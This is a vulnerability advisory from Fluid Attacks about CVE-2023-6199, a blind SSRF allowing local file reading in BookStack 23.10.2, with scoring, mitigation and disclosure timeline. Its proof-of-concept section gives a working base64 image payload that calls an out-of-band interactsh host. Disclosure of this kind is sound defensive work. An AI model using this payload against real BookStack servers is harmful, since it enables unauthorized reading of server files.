Book Stack v23.10.2 - LFR via Blind SSRF

Summary

NameBook Stack v23.10.2 - LFR via Blind SSRF
Code name
ProductBook Stack
Affected versionsVersion 23.10.2
StatePublic
Release date2023-11-20

Vulnerability

KindServer-side request forgery (SSRF)
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
CVSSv3.1 Base Score7.1
Exploit availableNo
CVE ID(s)

Description

Book Stack version 23.10.2 allows filtering local files on the server. This is possible because the application is vulnerable to SSRF.

Vulnerability

A server-side request forgery (SSRF) vulnerability has been identified in Book Stack that, under certain conditions, could allow an attacker to obtain local files from the server. The attacker must have writer permissions.

POC

<!-- 1. OOB interactsh-client -v => clc2nf2q8vb4audkj6ngndxkxg7c7y1pj.oast.site 2. Craft Payload https://clc2nf2q8vb4audkj6ngndxkxg7c7y1pj.oast.site/image.png | base64 => aHR0cHM6Ly9jbGMybmYycTh2YjRhdWRrajZuZ25keGt4ZzdjN3kxcGoub2FzdC5zaXRlL2ltYWdlLnBuZw 3. Exploit => <img src='data:image/png;base64,[BASE64 HERE]'/> --> <img src='data:image/png;base64,aHR0cHM6Ly9jbGMybmYycTh2YjRhdWRrajZuZ25keGt4ZzdjN3kxcGoub2FzdC5zaXRlL2ltYWdlLnBuZw'/>

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-6199 to refer to this issue from now on.

System Information

  • Version: Book Stack 23.10.2

  • Operating System: MacOS

Mitigation

An updated version of BookStack is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/BookStackApp/BookStack/

BookStack release https://www.bookstackapp.com/blog/bookstack-release-v23-10-3/

Timeline

Time-lapse-logo

2023-11-17

Vulnerability discovered.

Time-lapse-logo

2023-11-18

Vendor contacted.

Time-lapse-logo

2023-11-19

Vendor replied acknowledging the report.

Time-lapse-logo

2023-11-19

Vendor Confirmed the vulnerability.

Time-lapse-logo

2023-11-20

Vulnerability patched.

Time-lapse-logo

2023-11-20

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.